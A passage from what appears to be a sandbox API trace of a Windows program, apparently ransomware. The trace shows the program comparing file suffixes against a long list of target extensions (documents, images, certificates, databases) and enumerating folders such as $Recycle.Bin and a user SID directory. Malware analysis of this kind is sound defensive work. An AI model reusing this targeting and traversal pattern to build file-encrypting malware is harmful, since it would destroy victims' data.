4 [0178.111] lstrcmpiW (lpString1=".mos", lpString2=".bat") returned 1 [0178.111] lstrlenW (lpString=".mov") returned 4 [0178.111] lstrcmpiW (lpString1=".mov", lpString2=".bat") returned 1 [0178.111] lstrlenW (lpString=".mp3") returned 4 [0178.111] lstrcmpiW (lpString1=".mp3", lpString2=".bat") returned 1 [0178.111] lstrlenW (lpString=".mp4") returned 4 [0178.111] lstrcmpiW (lpString1=".mp4", lpString2=".bat") returned 1 [0178.111] lstrlenW (lpString=".mpeg") returned 5 [0178.111] lstrcmpiW (lpString1=".mpeg", lpString2="].bat") returned -1 [0178.111] lstrlenW (lpString=".mpg") returned 4 [0178.111] lstrcmpiW (lpString1=".mpg", lpString2=".bat") returned 1 [0178.111] lstrlenW (lpString=".mpv") returned 4 [0178.111] lstrcmpiW (lpString1=".mpv", lpString2=".bat") returned 1 [0178.111] lstrlenW (lpString=".mrw") returned 4 [0178.111] lstrcmpiW (lpString1=".mrw", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".msg") returned 4 [0178.112] lstrcmpiW (lpString1=".msg", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".mxl") returned 4 [0178.112] lstrcmpiW (lpString1=".mxl", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".myd") returned 4 [0178.112] lstrcmpiW (lpString1=".myd", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".myi") returned 4 [0178.112] lstrcmpiW (lpString1=".myi", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".nef") returned 4 [0178.112] lstrcmpiW (lpString1=".nef", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".nrw") returned 4 [0178.112] lstrcmpiW (lpString1=".nrw", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".obj") returned 4 [0178.112] lstrcmpiW (lpString1=".obj", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".odb") returned 4 [0178.112] lstrcmpiW (lpString1=".odb", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".odc") returned 4 [0178.112] lstrcmpiW (lpString1=".odc", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".odm") returned 4 [0178.112] lstrcmpiW (lpString1=".odm", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".odp") returned 4 [0178.112] lstrcmpiW (lpString1=".odp", lpString2=".bat") returned 1 [0178.112] lstrlenW (lpString=".ods") returned 4 [0178.112] lstrcmpiW (lpString1=".ods", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".oft") returned 4 [0178.113] lstrcmpiW (lpString1=".oft", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".one") returned 4 [0178.113] lstrcmpiW (lpString1=".one", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".onepkg") returned 7 [0178.113] lstrcmpiW (lpString1=".onepkg", lpString2="li].bat") returned -1 [0178.113] lstrlenW (lpString=".onetoc2") returned 8 [0178.113] lstrcmpiW (lpString1=".onetoc2", lpString2=".li].bat") returned 1 [0178.113] lstrlenW (lpString=".opt") returned 4 [0178.113] lstrcmpiW (lpString1=".opt", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".oqy") returned 4 [0178.113] lstrcmpiW (lpString1=".oqy", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".orf") returned 4 [0178.113] lstrcmpiW (lpString1=".orf", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".p12") returned 4 [0178.113] lstrcmpiW (lpString1=".p12", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".p7b") returned 4 [0178.113] lstrcmpiW (lpString1=".p7b", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".p7c") returned 4 [0178.113] lstrcmpiW (lpString1=".p7c", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".pam") returned 4 [0178.113] lstrcmpiW (lpString1=".pam", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".pbm") returned 4 [0178.113] lstrcmpiW (lpString1=".pbm", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".pct") returned 4 [0178.113] lstrcmpiW (lpString1=".pct", lpString2=".bat") returned 1 [0178.113] lstrlenW (lpString=".pcx") returned 4 [0178.114] lstrcmpiW (lpString1=".pcx", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pdd") returned 4 [0178.114] lstrcmpiW (lpString1=".pdd", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pdf") returned 4 [0178.114] lstrcmpiW (lpString1=".pdf", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pdp") returned 4 [0178.114] lstrcmpiW (lpString1=".pdp", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pef") returned 4 [0178.114] lstrcmpiW (lpString1=".pef", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pem") returned 4 [0178.114] lstrcmpiW (lpString1=".pem", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pff") returned 4 [0178.114] lstrcmpiW (lpString1=".pff", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pfm") returned 4 [0178.114] lstrcmpiW (lpString1=".pfm", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pfx") returned 4 [0178.114] lstrcmpiW (lpString1=".pfx", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".pgm") returned 4 [0178.114] lstrcmpiW (lpString1=".pgm", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".php") returned 4 [0178.114] lstrcmpiW (lpString1=".php", lpString2=".bat") returned 1 [0178.114] lstrlenW (lpString=".php3") returned 5 [0178.114] lstrcmpiW (lpString1=".php3", lpString2="].bat") returned -1 [0178.114] lstrlenW (lpString=".php4") returned 5 [0178.115] lstrcmpiW (lpString1=".php4", lpString2="].bat") returned -1 [0178.115] lstrlenW (lpString=".php5") returned 5 [0178.115] lstrcmpiW (lpString1=".php5", lpString2="].bat") returned -1 [0178.115] lstrlenW (lpString=".phtml") returned 6 [0178.115] lstrcmpiW (lpString1=".phtml", lpString2="i].bat") returned -1 [0178.115] lstrlenW (lpString=".pict") returned 5 [0178.115] lstrcmpiW (lpString1=".pict", lpString2="].bat") returned -1 [0178.115] lstrlenW (lpString=".pl") returned 3 [0178.115] lstrcmpiW (lpString1=".pl", lpString2="bat") returned -1 [0178.115] lstrlenW (lpString=".pls") returned 4 [0178.115] lstrcmpiW (lpString1=".pls", lpString2=".bat") returned 1 [0178.115] lstrlenW (lpString=".pm") returned 3 [0178.115] lstrcmpiW (lpString1=".pm", lpString2="bat") returned -1 [0178.115] lstrlenW (lpString=".png") returned 4 [0178.115] lstrcmpiW (lpString1=".png", lpString2=".bat") returned 1 [0178.115] lstrlenW (lpString=".pnm") returned 4 [0178.115] lstrcmpiW (lpString1=".pnm", lpString2=".bat") returned 1 [0178.115] lstrlenW (lpString=".pot") returned 4 [0178.115] lstrcmpiW (lpString1=".pot", lpString2=".bat") returned 1 [0178.115] lstrlenW (lpString=".potm") returned 5 [0178.115] lstrcmpiW (lpString1=".potm", lpString2="].bat") returned -1 [0178.115] lstrlenW (lpString=".potx") returned 5 [0178.115] lstrcmpiW (lpString1=".potx", lpString2="].bat") returned -1 [0178.115] lstrlenW (lpString=".ppa") returned 4 [0178.116] lstrcmpiW (lpString1=".ppa", lpString2=".bat") returned 1 [0178.116] lstrlenW (lpString=".ppam") returned 5 [0178.116] lstrcmpiW (lpString1=".ppam", lpString2="].bat") returned -1 [0178.116] lstrlenW (lpString=".ppm") returned 4 [0178.116] lstrcmpiW (lpString1=".ppm", lpString2=".bat") returned 1 [0178.116] lstrlenW (lpString=".pps") returned 4 [0178.116] lstrcmpiW (lpString1=".pps", lpString2=".bat") returned 1 [0178.116] lstrlenW (lpString=".ppsm") returned 5 [0178.116] lstrcmpiW (lpString1=".ppsm", lpString2="].bat") returned -1 [0178.116] lstrlenW (lpString=".ppt") returned 4 [0178.116] lstrcmpiW (lpString1=".ppt", lpString2=".bat") returned 1 [0178.116] lstrlenW (lpString=".pptm") returned 5 [0178.116] lstrcmpiW (lpString1=".pptm", lpString2="].bat") returned -1 [0178.116] lstrlenW (lpString=".pptx") returned 5 [0178.116] lstrcmpiW (lpString1=".pptx", lpString2="].bat") returned -1 [0178.116] lstrlenW (lpString=".prn") returned 4 [0178.116] lstrcmpiW (lpString1=".prn", lpString2=".bat") returned 1 [0178.116] lstrlenW (lpString=".ps") returned 3 [0178.116] lstrcmpiW (lpString1=".ps", lpString2="bat") returned -1 [0178.116] lstrlenW (lpString=".psb") returned 4 [0178.116] lstrcmpiW (lpString1=".psb", lpString2=".bat") returned 1 [0178.116] lstrlenW (lpString=".psd") returned 4 [0178.117] lstrcmpiW (lpString1=".psd", lpString2=".bat") returned 1 [0178.117] lstrlenW (lpString=".pst") returned 4 [0178.117] lstrcmpiW (lpString1=".pst", lpString2=".bat") returned 1 [0178.117] lstrlenW (lpString=".ptx") returned 4 [0178.117] lstrcmpiW (lpString1=".ptx", lpString2=".bat") returned 1 [0178.117] lstrlenW (lpString=".pub") returned 4 [0178.117] lstrcmpiW (lpString1=".pub", lpString2=".bat") returned 1 [0178.117] lstrlenW (lpString=".pwm") returned 4 [0178.117] lstrcmpiW (lpString1=".pwm", lpString2=".bat") returned 1 [0178.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.118] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0178.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.120] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0178.121] FindClose (in: hFindFile=0x69a7f0 | out: hFindFile=0x69a7f0) returned 1 [0178.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.121] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0178.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.121] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0178.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.121] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0178.122] FindClose (in: hFindFile=0x69a7f0 | out: hFindFile=0x69a7f0) returned 1 [0178.122] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.122] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0178.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.191] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0178.193] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.193] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0178.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.195] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0178.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.197] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0178.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.199] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0178.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.201] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0178.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.203] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0178.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.205] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0178.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.207] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0178.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.209] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0178.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.211] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0178.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.213] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0178.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.215] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0178.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.216] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0178.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.218] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0178.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.220] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0178.223] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.223] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0178.378] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.378] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0178.380] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.380] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0178.381] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.381] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0178.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.383] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, 